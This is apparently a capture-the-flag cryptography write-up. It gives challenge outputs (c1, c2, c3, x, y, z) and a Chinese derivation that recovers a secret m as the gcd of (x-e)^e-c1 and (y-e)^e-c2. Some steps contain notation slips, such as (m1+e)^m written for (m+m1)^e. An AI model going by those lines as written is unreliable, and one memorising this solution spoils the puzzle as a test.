print('c2 =',c2)
print('c3 =',c3)
print('x =',x)
print('y =',y)
print('z =',z)

'''
c1 =  85139434329272123519094184286276070319638471046264384499440682030525456122476228324462769126167628121006213531153927884870307999106015430909361792093581895091445829379547633304737916675926004298753674268141399550405934376072486086468186907326396270307581239055199288888816051281495009808259009684332333344687
c2 =  104554808380721645840032269336579549039995977113982697194651690041676187039363703190743891658905715473980017457465221488358016284891528960913854895940235089108270134689312161783470000803482494370322574472422461483052403826282470850666418693908817591349159407595131136843764544166774390400827241213500917391144
c3 =  94771625845449128812081345291218973301979152577131568497740476123729158619324753128517222692750900524689049078606978317742545997482763600884362992468406577524708622046033409713416026145377740182233674890063333534646927601262333672233695863286637817471270314093720827409474178917969326556939942622112511819330
x =  78237329408351955465927092805995076909826011029371783256454322166600398149132623484679723362562600068961760410039241554232588011577854168402399895992331761353772415982560522912511879304977362225597552446397868843275129027248765252784503841114291392822052506837132093960290237335686354012448414804030938873765
y =  100442166633632319633494450595418167608036668647704883492068692098914206322465717138894302011092841820156560129280901426898815274744523998613724326647935591857728931946261379997352809249780159136988674034759483947949779535134522005905257436546335376141008113285692888482442131971935583298243412131571769294029
z =  104712661985900115750011628727270934552698948001634201257337487373976943443738367683435788889160488319624447315127992641805597631347763038111352925925686965948545739394656951753648392926627442105629724634607023721715249914976189181389720790879720452348480924301370569461741945968322303130995996793764440204452
'''

1、已知
$c1=(m+m1)^e\%(m*m1)\\ x=(m1+e)^m\%(m*m1)$
2、由多项式展开公式
$(m+m1)^e = m^e + \Bigl(C_e^1(m1)^{e-1}m^1+...C_e^{e-1}(m1)^1m^{e-1}\Bigr)+m1^e\\ =m^e +m1^e+\Bigl(C_e^1(m1)^{e-2}(m*m1)+...C_e^{e-1}(m*m1)m^{e-2}\Bigr)\\ =m^e+m1^e+k*(m*m1)$
则
$(m1+e)^m\%(m*m1) = m^e\%(m*m1) +m1^e\%(m*m1)$
由 $c1=(m+m1)^e\%(m*m1)$ ，得
$m^e+m1^e \equiv c1\ \ (mod(m*m1))\\ m^e+m1^e = c1+(k*m1)*m\\ m1^e = c1\%m\\ c1=m1^e+k_1*m$
3、由 $x=(m1+e)^m\%(m*m1)$ ，得
$m1^m+e^m \equiv x\ \ (mod(m*m1))\\ m1^m+e^m = x + (k*m1)*m\\ m1^m+e^m \equiv x\ \ (mod(m))$
由费马小定理（当a不是p的倍数且p为素数时， $a^{p-1}\equiv 1(mod\ p)$ ，即 $a^p\equiv a(mod\ p)$ ），得
$m1*m+e*m \equiv x\ \ (mod\ m)\\ m1+e=x\%m\\ x=m1+e+k_2*m$
4、
$x-e=m1+k_2*m\\ (x-e)^e=m1^e+k_3*m\\ c1=m1^e+k_1*m\\ (x-e)^e-c1=k_4*m$
同理， $(y-e)^e-c2=k_5*m$ ，求gcd即可得m